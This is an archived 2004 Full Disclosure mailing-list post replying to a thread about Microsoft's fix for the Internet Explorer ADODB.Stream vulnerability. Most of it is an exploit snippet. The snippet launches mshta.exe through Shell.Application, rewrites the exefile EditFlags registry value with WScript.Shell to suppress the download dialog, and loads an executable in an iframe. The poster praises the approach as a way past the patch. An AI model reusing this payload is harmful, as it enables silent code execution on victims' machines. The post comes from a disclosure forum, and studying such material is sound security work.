Full Disclosure mailing list archives
Betr.: Re: Fix for IE ADODB.Stream vulnerability is out
From: "http-equiv () excite com" <1 () malware com>
Date: Sat, 3 Jul 2004 01:44:30 -0000
<!-- ActiveXObject("Shell.Application"); obj.ShellExecut("mshta.exe","about:<script>var wsh=new ActiveXObject('WScript.Shell');wsh.RegWrite ('HKCR\exefile\EditFlags', 0x38070000, "REG_BINARY");) </script><iframe src=foo.exe>"); --> On quick reflection, I completely missed Matthew's point. It's brilliant. If you can indeed kill the download dialog, kill it, stick a frame in it and bang. If it doesn't work, use the regWrite and re-set the adodb.stream instead, and continue on your merry way. -- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Betr.: Re: Fix for IE ADODB.Stream vulnerability is out http-equiv () excite com (Jul 02)
- <Possible follow-ups>
- Betr.: Re: Fix for IE ADODB.Stream vulnerability is out http-equiv () excite com (Jul 02)
- Betr.: Re: Fix for IE ADODB.Stream vulnerability is out http-equiv () excite com (Jul 02)